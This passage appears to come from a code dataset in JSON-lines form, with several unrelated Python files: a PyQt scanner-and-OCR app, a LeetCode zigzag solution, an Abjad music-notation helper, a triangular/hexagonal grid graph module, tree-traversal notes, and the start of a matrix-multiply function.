self.configWin.ui.cropY.setValue(self.cropSize['top'])\n self.configWin.ui.cropW.setValue(self.cropSize['width'])\n self.configWin.ui.cropH.setValue(self.cropSize['height'])\n\n if self.settings.contains('contrast'):\n self.configWin.ui.brigthnessLcd.setValue(float(self.brightness))\n self.configWin.ui.brigthnesSlider.setValue(int(float(self.brightness)*10))\n self.configWin.ui.contrastLcd.setValue(float(self.contrast))\n self.configWin.ui.contrastSlider.setValue(int(float(self.contrast)*10))\n\n if self.settings.contains('color'):\n self.configWin.ui.colorLcd.setValue(float(self.color))\n self.configWin.ui.colorSlider.setValue(int(float(self.color)*10))\n\n if self.settings.contains(\"sharpness\"):\n self.configWin.ui.sharpnessLcd.setValue(float(self.sharpness))\n self.configWin.ui.sharpnessSlider.setValue(int(float(self.sharpness)*10))\n\n if self.settings.contains(\"gamma\"):\n self.configWin.ui.gammaLcd.setValue(float(self.gamma))\n self.configWin.ui.gammaSlider.setValue(int(float(self.gamma)*10))\n\n def configureWindow(self):\n\n self.configWin = ConfigWindow(self)\n\n self.configWin.ui.scanButton.clicked.connect(self.configScan)\n self.configWin.ui.saveButton.clicked.connect(self.saveConfig)\n self.setConfigWinSettings()\n ## Connect the Combox after setConfigWinSettings\n ## if not you ran into an RecursionError!!\n self.configWin.ui.profileSelect.currentIndexChanged.connect(self.configWinUpdate)\n\n if self.dev is not None:\n self.configWin.ui.scanButton.setEnabled(True)\n self.configWin.ui.scanButton.setText(\"Start Scan\")\n else:\n self.configWin.ui.scanButton.setEnabled(False)\n self.configWin.ui.scanButton.setText(\"Sart Scan Service first\")\n\n self.configWin.show()\n\n @pyqtSlot(int)\n def configWinUpdate(self,pos):\n group = self.configWin.ui.profileSelect.currentText()\n idx = self.configWin.ui.profileSelect.currentIndex()\n\n if group == \"default\":\n group = \"\"\n\n ## Disconnect the Combox before you add new values\n ## if not you ran into an RecursionError!!\n self.configWin.ui.profileSelect.currentIndexChanged.disconnect()\n\n self.getSettings(group)\n self.setConfigWinSettings()\n self.configWin.ui.profileSelect.setCurrentIndex(idx)\n ## Connect the Combox after setConfigWinSettings\n ## if not you ran into an RecursionError!!\n self.configWin.ui.profileSelect.currentIndexChanged.connect(self.configWinUpdate)\n pass\n\n def closeEvent(self, event):\n #if not set, process keeps running in background\n self.scanStatus = False\n\n\n def openDir(self):\n fileDlg = QFileDialog()\n self.scanFolder = fileDlg.getExistingDirectory(self,'Scan Folder',self.scanFolder, QFileDialog.DontUseNativeDialog)\n self.ui.scanpath.setText(self.scanFolder)\n self.settings.beginGroup(self.defaultGroup)\n self.settings.setValue(\"path\",self.scanFolder)\n self.settings.sync()\n self.settings.endGroup()\n \n\n\n def startThread(self, fn, resultFn=None, complete=None):\n worker = Worker(fn) # Any other args, kwargs are passed to the run function\n if resultFn is not None:\n worker.signals.result.connect(resultFn)\n if complete is not None:\n worker.signals.finished.connect(complete)\n #worker.signals.progress.connect(self.scannerProgress)\n self.threadpool.start(worker)\n \n\n \n def thread_complete(self):\n self.scannerProgress(100)\n time.sleep(1)\n self.dialog.close()\n \n if self.dev_available:\n self.show()\n else:\n #TODO: put error dlg here\n self.message.setText(\"No scanner found\\n Check your Configuration!\")\n self.message.exec()\n print(\"Error: No Devices found\")\n \n \n print(\"THREAD COMPLETE! \", self.threadpool.activeThreadCount())\n\n\n @pyqtSlot(str)\n def scanPathCanged(self,path):\n self.scanPath = path\n self.createCompleter()\n\n def createCompleter(self):\n\n ff = glob.glob(self.scanPath+\"/*.pdf\")\n files = []\n for f in ff:\n files.append(os.path.basename(f).split('.')[0])\n completer = QCompleter(files)\n completer.setCaseSensitivity(Qt.CaseInsensitive)\n self.ui.filename.setCompleter(completer)\n\n\n def scannerLookup(self):\n\n #self.dialog.setModal(True)\n\n self.uidlg = Ui_Dialog()\n self.uidlg.setupUi(self.dialog)\n \n self.dialog.show()\n \n def checkScanMode(self):\n mode = \"\"\n if self.ui.btnBuW.isChecked():\n mode = self.ui.btnBuW.text()\n elif self.ui.btnGray.isChecked():\n mode = self.ui.btnGray.text()\n elif self.ui.btnColor.isChecked():\n mode = self.ui.btnColor.text()\n print(mode)\n return mode\n \n \n \n def scannerAddToDlg(self,result):\n self.devices = result\n if len(self.devices) > 0:\n self.dev_available = True\n for i, dev in enumerate(result):\n self.ui.comboBox.addItem(dev[i])\n else:\n return\n\n\n def scannerProgress(self,val):\n self.uidlg.progressBar.setValue(val)\n \n \n def scanners(self):\n self.scannerLookup()\n self.startThread(sane.get_devices,self.scannerAddToDlg, self.thread_complete)\n\n def scannerCheck(self):\n self.statusBar().showMessage(\"looking up for scanner ....\")\n print(self.devices[0])\n count = 0\n while self.is_dev:\n\n try:\n #ToDo: check index from\n \n self.dev = sane.open(self.devices[0][0])\n \n \n except:\n print(\"no scanner connected, waiting...\",self.dev)\n if self.dev is not None:\n self.is_dev = False\n self.dev_connected = True\n print(\"scanner connected\")\n time.sleep(3)\n ## Stop process after 3 times to avoid endless loop if no device is available\n ## due started as thread\n count += 1\n if count > 2:\n self.is_dev = False\n\n self.statusBar().showMessage(\"No Scanner connected!\")\n \n def commonThreadEnd(self):\n print(\"Thread ended\")\n \n def scanDocThreadEnded(self):\n self.statusBar().showMessage(\"Job stopped\")\n self.scanStatus = False\n self.setLedStatus()\n \n def scannerCheckThreadEnd(self):\n print(\"Lookup Thread ended\")\n\n if self.dev_connected:\n self.startThread(self.scanDocuments,None,self.scanDocThreadEnded)\n else:\n msg = QMessageBox()\n msg.setText(\"No Scanner Connected\")\n msg.setIcon(QMessageBox.Warning)\n msg.exec()\n\n def setScannerStatus(self):\n if self.dev_connected:\n self.setLedStatus()\n self.statusBar().showMessage(\"Scanner connected\",10)\n self.setScanButton(\"running\")\n else:\n self.setScanButton('stopped')\n\n \n def setLedStatus(self):\n if self.scanStatus:\n pix = QPixmap(\":/images/square_green.svg\")\n else:\n pix = QPixmap(\":/images/square_red.svg\")\n\n self.ui.statusLed.setPixmap(pix)\n\n\n def scanDocuments(self):\n ip = self.devices[0][0].split('=')[1]\n print(ip)\n url = 'http://' + ip + XML_PATH\n self.dev.mode = self.checkScanMode()\n self.dev.resolution = int(self.ui.resolutions.currentText())\n imgNr = 0\n savePath = self.ui.scanpath.text()+\"/\"\n imgPrefix = self.ui.filename.text()+\"_\"\n #self.dev.contrast = 900\n #self.dev.brightness = self.brightness\n while self.scanStatus:\n btnreq = urlopen(url)\n soup = bs4.BeautifulSoup(str(btnreq.read()),'lxml')\n if soup.startscan.string == str(1):\n #print(\"Pressed\")\n if soup.adfloaded.string == str(1):\n self.adf=True\n print(\"ADF Source\")\n self.dev.source = 'ADF'\n imIter = self.dev.multi_scan()\n \n while self.adf:\n try: \n im = imIter.next()\n imgNr = imgNr+1\n img = imgPrefix+str(imgNr)+\".png\"\n im.save(savePath+img)\n if self.ocr:\n self.ocrFiles.append(savePath+img)\n except:\n self.adf=False\n break\n else:\n self.adf=False\n imgNr = imgNr+1\n img = imgPrefix+str(imgNr)+\".png\"\n self.dev.start()\n im = self.dev.snap()\n self.enhanceImage(im,savePath,img)\n if self.ocr:\n self.ocrFiles.append(savePath+img)\n time.sleep(3)\n\n def enhanceImage(self,image,path,pf):\n brightness = ImageEnhance.Brightness(image)\n image = brightness.enhance(float(self.brightness))\n contrast = ImageEnhance.Contrast(image)\n image = contrast.enhance(float(self.contrast))\n if self.dev.mode == \"color\":\n colour = ImageEnhance.Color(image)\n image = colour.enhance(float(self.color))\n sharpness = ImageEnhance.Sharpness(image)\n image = sharpness.enhance(float(self.sharpness))\n\n print(\"Gamma: \", self.gamma)\n gamma = float(self.gamma)\n image = image.point(self.gamma_table( gamma, gamma, gamma))\n\n print(\"image saved \",self.ui.scanpath.text()+\"/\"+pf)\n image.save(path+pf)\n\n @pyqtSlot()\n def profileChanged(self):\n group = self.ui.cmbBoxOcr.currentText()\n self.getSettings(group)\n\n @pyqtSlot()\n def leditcolor(self):\n self.ui.scanpath.setStyleSheet(\"background-color:rgb(255, 255, 255)\")\n self.ui.filename.setStyleSheet(\"background-color:rgb(255, 255, 255)\")\n\n def startScanJob(self):\n \n # print(\"Path: \",self.scanpath.text())\n # print(\"Mode: \",mode)\n # print(\"Resolution: \", self.resolutions.currentText())\n # print(\"File: \", self.filename.text())\n\n if len(self.ui.scanpath.text()) == 0:\n msg = QMessageBox()\n msg.setText(\"Please enter file path!\")\n msg.exec()\n self.ui.scanpath.setStyleSheet(\"background-color:rgb(255, 170, 127)\")\n return\n \n if len(self.ui.filename.text()) == 0:\n msg = QMessageBox()\n msg.setText(\"Please enter file name prefix!\")\n msg.exec()\n self.ui.filename.setStyleSheet(\"background-color:rgb(255, 170, 127)\")\n return\n\n\n\n if not self.scanStatus:\n self.setScanButton(\"starting\")\n self.startThread(self.scannerCheck,self.setScannerStatus, self.scannerCheckThreadEnd)\n self.scanStatus = True\n self.ui.scanpath.setEnabled(False)\n self.ui.filename.setEnabled(False)\n else:\n self.scanStatus = False\n self.setScanButton(\"stopped\")\n self.ui.scanpath.setEnabled(True)\n self.ui.filename.setEnabled(True)\n self.ui.filename.clear()\n\n if self.ocr and len(self.ocrFiles) > 0:\n #self.ui.btnOcr.setEnabled(True)\n self.ocr_StrartDlg()\n # self.tempocr = tempfile.NamedTemporaryFile(delete=False)\n # for f in self.ocrFiles:\n # self.tempocr.write(str(f+\"\\n\").encode())\n # self.tempocr.close()\n \n def setScanButton(self,status):\n\n if status == \"starting\":\n self.btnStyle = self.ui.btnStartscan.styleSheet()\n \n self.ui.btnStartscan.setStyleSheet(\"background-color: yellow\")\n self.ui.btnStartscan.setText(\"Starting...\")\n\n if status == \"running\":\n self.ui.btnStartscan.setStyleSheet(\"background-color: red\")\n self.ui.btnStartscan.setText(\"Stop\")\n self.statusBar().showMessage(\"Scan job is running..\")\n \n if status == \"stopped\":\n self.ui.btnStartscan.setText(\"Sart Scan\")\n self.ui.btnStartscan.setStyleSheet(self.btnStyle)\n\n\n def ocr_StrartDlg(self):\n ocr_dlg = QMessageBox()\n ocr_dlg.setText(\"Start OCR-Process?\")\n ocr_dlg.setInformativeText(\"Create a searchable PDF-Document or stay with images only\")\n ocr_dlg.setStandardButtons(QMessageBox.Yes | QMessageBox.No);\n ocr_dlg.setDefaultButton(QMessageBox.Yes)\n ocr_dlg.setIcon(QMessageBox.Question)\n ret = ocr_dlg.exec()\n\n if ret == QMessageBox.Yes:\n self.ocr_startProcess()\n\n\n def ocr_startProcess(self):\n self.progressDlg = QProgressDialog(self)\n\n self.progressDlg.setWindowTitle(\"OCR Process\")\n self.progressDlg.setLabelText(\"OCR Process in Progress ...\")\n self.progressDlg.setAutoClose(False)\n self.progressDlg.setAutoReset(False)\n self.progressDlg.setModal(True)\n\n\n self.startThread(self.ocr_process,None,self.ocr_stopped)\n\n def gamma_table(self, gamma_r, gamma_g, gamma_b, gain_r=1.0, gain_g=1.0, gain_b=1.0):\n r_tbl = [min(255, int((x / 255.) ** (1. / gamma_r) * gain_r * 255.)) for x in range(256)]\n g_tbl = [min(255, int((x / 255.) ** (1. / gamma_g) * gain_g * 255.)) for x in range(256)]\n b_tbl = [min(255, int((x / 255.) ** (1. / gamma_b) * gain_b * 255.)) for x in range(256)]\n\n return r_tbl + g_tbl + b_tbl\n\n def ocr_process(self):\n\n\n\n if len(self.ocrFiles) > 0:\n\n self.tempocr = tempfile.NamedTemporaryFile(delete=False)\n\n\n val = 0\n ### add one more for pdf create process\n max = len(self.ocrFiles) + 1\n self.progressDlg.setRange(0,max)\n\n for f in self.ocrFiles:\n val += 1\n self.tempocr.write(str(f+\"\\n\").encode())\n\n\n self.progressDlg.setValue(val)\n\n\n #TODO: if is checked\n #NOTE: this is crop and resize in one step\n # size and dpi are predifined to A4 300\n print(self.cropSize)\n if self.cropSize['width'] > 1:\n ocrt.crop_resize(f,self.cropSize[\"left\"],self.cropSize[\"top\"], self.cropSize[\"width\"],self.cropSize[\"height\"])\n #TODO: if is checked\n ocrt.check_orientation(f)\n #TODO: if is checked\n ocrt.deskew(f)\n\n self.tempocr.close()\n\n\n print(self.tempocr.name)\n ## works in python 3.9+\n pdfname = self.ocrFiles[0].removesuffix(\"_1.png\")\n #pdfname, suff = self.ocrFiles[0].rsplit(\"_1.png\")\n # print(pdfname)\n ### this runs in its own process\n self.progressDlg.setLabelText(\"OCR Process finishing ...\")\n ocrt.create_pdf(self.tempocr.name, pdfname)\n ####\n ## Workaround to get a correct finished process\n ## while pytesseract uses subprocces which can not be handled in this thread\n ####\n while not os.path.isfile(pdfname+\".pdf\"):\n time.sleep(3)\n self.progressDlg.setValue(val+1)\n os.unlink(self.tempocr.name)\n self.ocrFiles.clear()\n else:\n return\n\n def ocr_stopped(self):\n print(\"OCR finished\")\n self.statusBar().showMessage(\"OCR finished\")\n self.progressDlg.close()\n self.ui.btnOcr.setEnabled(False)\n\n def ocr2pdf(self):\n fileDlg = QFileDialog(self)\n fileDlg.setNameFilter(\"Images (*.png .jpg)\")\n fileDlg.setFileMode(QFileDialog.FileMode.ExistingFiles)\n fileDlg.setOption(QFileDialog.DontUseNativeDialog)\n\n if fileDlg.exec():\n self.ocrFiles = fileDlg.selectedFiles()\n self.ocr_startProcess()\n pass\n \n def configScan(self):\n pixmap = QPixmap()\n self.dev.resolution=int(self.ui.resolutions.currentText())\n self.dev.mode=self.checkScanMode()\n self.dev.start()\n im = self.dev.snap()\n\n convertImg = io.BytesIO()\n im.save(convertImg,\"BMP\")\n pixmap.loadFromData(convertImg.getvalue(), \"BMP\")\n self.configWin.pixmapItem.setPixmap(pixmap)\n\n\n #self.configWin.pixmapItem.setPixmap(QPixmap.fromImage(pix))\n self.configWin.ui.view.fitInView(self.configWin.pixmapItem,Qt.KeepAspectRatio)\n self.configWin.pixmapItem.grabMouse()\n self.configWin.setBufferImage()\n self.configWin.enhanceImage()\n #im = None\n \n @pyqtSlot()\n def saveConfig(self):\n self.brightness = self.configWin.ui.brigthnessLcd.value()\n self.contrast = self.configWin.ui.contrastLcd.value()\n self.color = self.configWin.ui.colorLcd.value()\n self.sharpness = self.configWin.ui.sharpnessLcd.value()\n self.gamma = self.configWin.ui.gammaLcd.value()\n self.crop = self.configWin.ui.checkCrop.isChecked()\n self.cropSize['left'] = self.configWin.ui.cropX.value()\n self.cropSize['top'] = self.configWin.ui.cropY.value()\n self.cropSize['width'] = self.configWin.ui.cropW.value()\n self.cropSize['height'] = self.configWin.ui.cropH.value()\n\n group = self.configWin.ui.profileSelect.currentText()\n\n if group == \"default\":\n group = \"\"\n\n self.settings.setValue('defaultGroup',group)\n\n self.settings.beginGroup(group)\n\n self.settings.setValue('brightness',self.brightness)\n self.settings.setValue('contrast',self.contrast)\n self.settings.setValue('color',self.color)\n self.settings.setValue('sharpness',self.sharpness)\n self.settings.setValue('gamma',self.gamma)\n self.settings.setValue('ocr', self.ocr)\n self.settings.setValue('crop', self.crop)\n self.settings.setValue('cropSize',self.cropSize)\n #self.settings.setValue(\"path\",self.scanPath)\n self.settings.sync()\n self.settings.endGroup()\n self.configWin.close()\n\n @pyqtSlot(int)\n def ocrConfig(self,state):\n if state == Qt.Checked:\n self.ocr = True\n self.configWin.ui.OCR_Box.setEnabled(True)\n else:\n self.ocr = False\n self.configWin.ui.OCR_Box.setEnabled(False)\n\n\n def closeEvent(self,e):\n if self.tempocr is not None:\n if os.path.exists(self.tempocr.name):\n os.unlink(self.tempocr.name)\n if self.configWin is not None:\n if self.configWin.isVisible():\n self.configWin.close()\n\n\n e.accept()\ndef main():\n\n app = QApplication(sys.argv)\n window = MainWindow()\n window.scanners()\n \n #window.show()\n \n sys.exit(app.exec())\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"AlfredoCubitos/Scan2Folder","sub_path":"scan2folder.py","file_name":"scan2folder.py","file_ext":"py","file_size_in_byte":25847,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"34757595892","text":"class Solution:\n def convert(self, s: str, numRows: int) -> str:\n rows = {}\n chars = list(s)\n \n while chars:\n for i in range(numRows):\n if chars:\n rows[i] = rows.get(i, \"\") + chars.pop(0)\n for i in range(numRows-2, 0, -1):\n if chars:\n rows[i] = rows.get(i, \"\") + chars.pop(0)\n \n zigzag = \"\"\n for line in rows.values():\n zigzag += line\n \n return zigzag ","repo_name":"hrand1005/leetcode","sub_path":"0006-zigzag-conversion/0006-zigzag-conversion.py","file_name":"0006-zigzag-conversion.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"23708202914","text":"import abjad\nimport abjadext.nauert\n\n\ndef make_music_notation(pitches=60, durs=0.333, tempo=60, time_signature=(4,4)):\n \"\"\"Quick and simple music notation with Abjad.\n\n Converts pitch and duration values into music notation. Uses the Abjad\n quantizer.\n \n Parameters\n ----------\n pitches : list or scalar\n List of pitches, or scalar if constant pitch. Floating point values are\n interpreted as microtonal pitch deviations.\n durs: list or scalar\n List of durations, or scalar if constant duration. \n tempo: number\n Quarter note tempo mark.\n time_signature : tuple\n Musical time signature: (beats per measure, which note gets the beat).\n\n Returns\n -------\n abjadext.ipython display \n\n Notes\n -----\n If len(pitches) and len(durs) do not match, the smaller list is extended to \n match the length of the longer list by repeating the last value.\n\n Requires ipython ``%load_ext abjadext.ipython`` for display\n \"\"\"\n\n # check and convert to list if needed\n pitches = pitches if isinstance(pitches, list) else [pitches]\n durs = durs if isinstance(durs, list) else [durs]\n \n # extend short lists if size mismatch\n max_length = max(len(pitches), len(durs))\n pitches += [pitches[-1]] * (max_length - len(pitches))\n durs += [durs[-1]] * (max_length - len(durs))\n\n # offset pitches to C4 = 60\n pitches = [p - 60 for p in pitches]\n\n # scale durations to milliseconds\n durs = [d * 1000.0 for d in durs]\n \n # construct schema from tempo and time signature\n q_schema = abjadext.nauert.MeasurewiseQSchema(\n tempo=abjad.MetronomeMark((1, 4), tempo),\n time_signature=abjad.TimeSignature(time_signature),\n use_full_measure=True,\n )\n\n # sequence to be quantized\n q_event_seq = abjadext.nauert.QEventSequence.from_millisecond_pitch_pairs(tuple(zip(durs, pitches)))\n\n # quantize\n quantizer = abjadext.nauert.Quantizer()\n result = quantizer(q_event_seq, q_schema=q_schema)\n\n # stuff staff and score\n staff = abjad.Staff([result])\n score = abjad.Score([staff])\n\n # show\n return abjad.show(score)\n","repo_name":"davidkant/mai","sub_path":"mai/notation.py","file_name":"notation.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"38"} +{"seq_id":"33365983487","text":"# -*- coding: utf-8 -*-\n\"\"\"\nContains abstractions and implementations of a grid structure.\n\nCreated on Wed Jun 25 13:33:34 2014\n\n@author: schackv\n\"\"\"\nimport numpy as np\nfrom scipy.spatial import Delaunay\nfrom scipy.linalg import norm\nfrom scipy import sparse\nimport itertools\nfrom . import graphtools, misc\nimport networkx as nx\nimport logging\n\nclass Grid:\n \"\"\"Defines a Grid base class, consisting of a set of points and a set\n of functions to manipulate these points.\n \n The neighborhood data structure is using the networkx.Graph class.\"\"\"\n \n def __init__(self, xy,edges=[]):\n self.graph = nx.Graph()\n self.xy = xy\n for id, pos in enumerate(xy):\n self.graph.add_node(id,xy=pos)\n self.graph.add_edges_from(edges) \n \n @classmethod\n def from_textfile(cls, filename):\n \"\"\"Grid constructor based on files.\"\"\"\n xy = np.loadtxt(filename + '.points')\n edgelist = nx.read_edgelist(filename + '.edgelist',nodetype=int)\n return cls(xy,edgelist.edges())\n\n def write(self, filename):\n \"\"\"Write the grid to .point and .edgelist files.\"\"\"\n nx.write_edgelist(self.graph,filename + '.edgelist', data=False)\n np.savetxt(filename + '.points',self.xy)\n \n def resolve_edges(self):\n raise NotImplementedError()\n \n\n def edges(self):\n return self.graph.edges() \n \n def edge_lengths(self,scale_xy=None):\n if self.graph.number_of_nodes()==0 or self.graph.number_of_edges()==0:\n raise NoEdgesException()\n \n if scale_xy is None:\n scale_xy = (1,1)\n\n edge_lengths = [misc.weucl(self.graph.node[edge[0]]['xy'], self.graph.node[edge[1]]['xy'],scale_xy) for edge in self.graph.edges_iter()]\n# bondlengths_px = [norm(self.atoms[edge[0],:]-self.atoms[edge[1],:]) for edge in self.atom_edges]\n return np.array(edge_lengths)\n\n def edge_orientations(self):\n \"\"\"Return the orientations of each edge in radians.\"\"\"\n thetas = [misc.orientation(self.graph.node[edge[0]]['xy'], self.graph.node[edge[1]]['xy']) for edge in self.graph.edges_iter()]\n return thetas\n \n def edge_lengths_by_orientation(self, scale_xy=None, num_orientations=3, theta0 = np.pi/6):\n \"\"\"Get the edge lengths binned into num_orientations bins. \n The bins are equidistantly spaced from theta0 up til theta0+pi\n \n Returns bin_centers, oriented_lengths (num_orientations-tuple)\n \"\"\"\n\n orientations = self.edge_orientations()\n lengths = self.edge_lengths(scale_xy=scale_xy)\n bin_centers, bin_idx = misc.circular_binning(orientations,half_circle=True,nbins=num_orientations*2, theta0=theta0)\n \n oriented_lengths = []\n for b, bin_center in enumerate(bin_centers):\n oriented_lengths.append(np.array([x for (x,idx) in zip(lengths,bin_idx) if idx==b]))\n \n return bin_centers, oriented_lengths\n \n \"\"\" Add zero-mean Gaussian random noise to the grid points \"\"\"\n def add_noise(self,noise_std):\n self.xy += np.random.randn(self.xy.shape[0],2)*noise_std\n# for n, attr in self.graph.nodes_iter(data=True):\n# attr['xy'] += np.random.randn(2)*noise_std\n\n def rotate(self,theta):\n self.xy = rotate_grid(self.xy,theta)\n \n def translate(self,deltaxy):\n self.xy += deltaxy\n# for n, attr in self.graph.nodes_iter(data=True):\n# attr['xy'] += deltaxy\n\n def plot(self,color='b',linecolor='k',markersize=3):\n import matplotlib.pyplot as plt\n from matplotlib import collections as mc\n plt.plot(self.xy[:,0],self.xy[:,1],'.',color=color,ms=markersize)\n plt.gca().add_collection(mc.LineCollection(self.line_collection(),colors=linecolor))\n plt.axis('image')\n \n def plot_color(self, stretch_range=[0.127,0.157], scale_xy=None):\n import matplotlib.pyplot as plt\n from matplotlib import collections as mc\n linergb = misc.color_range(self.edge_lengths(scale_xy=scale_xy), stretch_range)\n plt.gca().add_collection(mc.LineCollection(self.line_collection(),colors=linergb))\n plt.axis('image')\n\n def line_collection(self):\n return line_collection(self.xy,self.graph.edges())\n \n \n\nclass TriangularGrid(Grid):\n \"\"\" Implements a triangular grid structure.\n \"\"\"\n\n @classmethod\n def from_simplices(cls, xy, simplices):\n edges = graphtools.tri_edges(simplices)\n g1 = cls(xy,edges)\n g1.simplices = simplices\n return g1\n\n def delaunay_triangulate(self):\n \"\"\" Resolve the edges in the current grid leveraging the Delaunay \n triangulation. Three values of method can be chosen:\n \"\"\"\n dt = Delaunay(self.xy)\n super().__init__(dt.points,graphtools.tri_edges(dt.simplices)) # init as new graph\n self.simplices = dt.simplices\n return self.edges()\n \n\nclass SimulatedTriangularGrid(TriangularGrid):\n \"\"\"Represents a triangular grid with a given number of rows and columns.\n \n Inherits TriangularGrid.\n \"\"\"\n def __init__(self, rows,cols, t):\n self.t = t # Hexagonal side length\n # Generate centers\n xy = []\n for i in range(rows):\n for j in range(cols):\n xy.append(center_position(i,j,t))\n xy = np.vstack(xy)\n super().__init__(xy)\n \n def resolve_edges(self,remove_long=True):\n super().delaunay_triangulate()\n \n if remove_long:\n # TODO Also remove simplices!\n # Remove too long edges\n lengths = self.edge_lengths()\n idx = lengths > 1.1*np.sqrt(3)*self.t # Edges to remove\n \n \n E = self.graph.edges()\n# [logging.debug(E[i]) for i in np.where(idx)[0]]\n for i in np.where(idx)[0]:\n self.graph.remove_edge(*E[i]) # Remove edge\n \n \n \n \nclass HexagonalGrid(Grid):\n \n \n def _simplex_to_arc_nbhood(simplices):\n \"\"\"Get the simplex-to-arc adjacency matrix as a sparse matrix.\n Input is an iterable of simplices.\n \n This is not pretty, but fairly rapid.\"\"\"\n \n edges = graphtools.tri_edges(simplices)\n\n tri_edges = np.sort(edges,axis=1) # Node with lowest id is first\n simplex_ids = [] # Simplex ids\n edge_ids = [] # Edge ids for each simplex\n for sid, s in enumerate(simplices):\n s_edges = np.sort([[s[0], s[1]], [s[0], s[2]], [s[1], s[2]]],axis=1) # Edges in triangle\n aux = [np.nonzero((tri_edges[:,0]==edge[0]) & (tri_edges[:,1]==edge[1]))[0] for edge in s_edges] # Find edge-ids in this particular simplex\n \n edge_ids.append(np.hstack(aux)) # Put in a list\n simplex_ids.append(np.ones(len(aux))*sid)\n simplex_ids = np.hstack(simplex_ids)\n edge_ids = np.hstack(edge_ids)\n \n # Return as sparse matrix\n Ns = len(simplices)\n Ne = len(edges)\n simplex_to_arc = sparse.csc_matrix((np.ones(len(simplex_ids)),np.vstack((simplex_ids,edge_ids))),shape=(Ns,Ne))\n return simplex_to_arc\n \n @classmethod\n def from_triangular(cls,triGrid):\n \"\"\"Create a hexagonal grid based on its dual, triangular, grid.\n Points are positioned as centers of each simplex.\n \"\"\"\n \n \n Ne = triGrid.graph.number_of_edges()\n if Ne==0:\n raise NoEdgesException()\n \n logging.debug('Constructing hexagonal grid from triangular ({} edges).'.format(Ne))\n\n # Get simplex-to-arc neighborhood as sparse matrix\n simplex_to_arc = HexagonalGrid._simplex_to_arc_nbhood(triGrid.simplices)\n \n # Use simplex-to-arc neighborhood to get simplex-to-simplex\n simplex_to_simplex = []\n for eid in range(Ne):\n aux = simplex_to_arc[:,eid].nonzero()[0]\n # Get length-2 combinations (i.e. pairs of simplices)\n [simplex_to_simplex.append(comb) for comb in itertools.combinations(aux, 2)]\n simplex_to_simplex = np.array(simplex_to_simplex)\n\n # Get simplex-centers \n xy = []\n for s in triGrid.simplices:\n center = np.mean(triGrid.xy[s,:],axis=0)\n xy.append(center)\n xy = np.vstack(xy)\n\n obj = cls(xy,edges=simplex_to_simplex)\n# super().__init__(cls,xy=xy,edges=simplex_to_simplex)\n \n logging.debug('Hexagonal grid constructed with {} points'.format(obj.graph.number_of_nodes()))\n return obj\n \n\n \n \n \ndef line_collection(xy,edges):\n return np.dstack((xy[list(edges),0],xy[list(edges),1]))\n\n \n \n\"\"\" Get the position of the hexagon center at a given row and column idx\"\"\"\ndef center_position(row_idx,col_idx,t):\n x = 1.5* t*(1 + col_idx)\n y = tri_sidelength(t) * row_idx\n if col_idx % 2 == 0: # Even rows\n y += 0.5*tri_sidelength(t)\n else:\n y += tri_sidelength(t)\n \n return x, y\n \n\"\"\"Side length of triangles connecting centers of hexagons with side length t\"\"\"\ndef tri_sidelength(t):\n return np.sqrt(3)*t\n \n \n\"\"\" Rotate a set of points around their center \"\"\"\ndef rotate_grid(xy,theta):\n ctr = np.mean(xy,axis=0)\n R = np.matrix([[np.cos(theta),-np.sin(theta)],\n [np.sin(theta),np.cos(theta)]])\n\n xy_rotated = (xy-ctr) * R.T\n return np.array(xy_rotated + ctr) # readd center\n \n \nclass NoEdgesException(Exception):\n pass\n \n\n \n\n\n \n \n \n \n \n ","repo_name":"schackv/graphene","sub_path":"graphene/grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":9734,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"8590020872","text":"\"\"\"\nAll different kinds of Tree Traversal implemented iteratively\n\"\"\"\n\n\n\"\"\"\nPreOrder Traversal: Root, Left, Right\n\nAlgorithm:\n\n1) Create an empty stack nodeStack and push root node to stack.\n2) Do following while nodeStack is not empty.\n Pop an item from stack and print it.\n Push right child of popped item to stack\n Push left child of popped item to stack\n\nSince all the node is being visited exactly once therefore the time complexity is O(n)\n\nTime Complexity: O(n)\nSpace Complexity: O(n)\n\n\"\"\"\n\nclass Solution(object):\n def preorderTraversal(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[List[int]]\n \"\"\"\n \n if not root: return\n \n stack = [root]\n answer = []\n \n while stack:\n temp = stack.pop()\n answer.append(temp.val)\n \n if temp.right:\n stack.append(temp.right)\n \n if temp.left:\n stack.append(temp.left)\n \n return answer\n\n\"\"\"\nInOrder Traversal: Left, Root, Right\n\n\nSince all the node is being visited exactly once therefore the time complexity is O(n)\n\nTime Complexity: O(n)\nSpace Complexity: O(n)\n\n\"\"\"\n\n\n\n\n\n\n\n\n\n\n\"\"\"\nPostOrder Traversal: Left, Right, Root\n\n\nSince all the node is being visited exactly once therefore the time complexity is O(n)\n\nTime Complexity: O(n)\nSpace Complexity: O(n)\n\n\"\"\"\n\n\n\n\"\"\"\nLevelOrder Traversal using DPS and PreOrder\n\nAlgorithm:\n\n\nSince all the node is being visited exactly once therefore the time complexity is O(n)\n\nAlgorithm:\n\nmantain a queue and initially add root to it.\n\nwhile queue is not null: perform the following steps:\n Take all elements from queue, add their values to res list.\n create list \"nextbatch\" of all children of nodes in queue\n reassign queue = nextbatch\n\nTime Complexity: O(n)\nSpace Complexity: O(n)\n\n\"\"\"\n\nclass Solution(object):\n def levelOrder(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[List[int]]\n \"\"\"\n \n if not root: return []\n\n queue=[root]\n res= []\n \n while len(queue):\n nextbatch=[]\n res.append([node.val for node in queue if node is not None])\n for node in queue:\n if node:\n if node.left:\n nextbatch.append(node.left)\n if node.right:\n nextbatch.append(node.right)\n queue = nextbatch\n return res","repo_name":"mostofashakib/Applied-Algorithm","sub_path":"Leetcode/Python Solutions/Binary Trees/TreeTraversalIterative.py","file_name":"TreeTraversalIterative.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"71879040109","text":"def matrix_multiply(matrix1, matrix2):\n rows1, cols1 = len(matrix1), len(matrix1[0])\n rows2, cols2 = 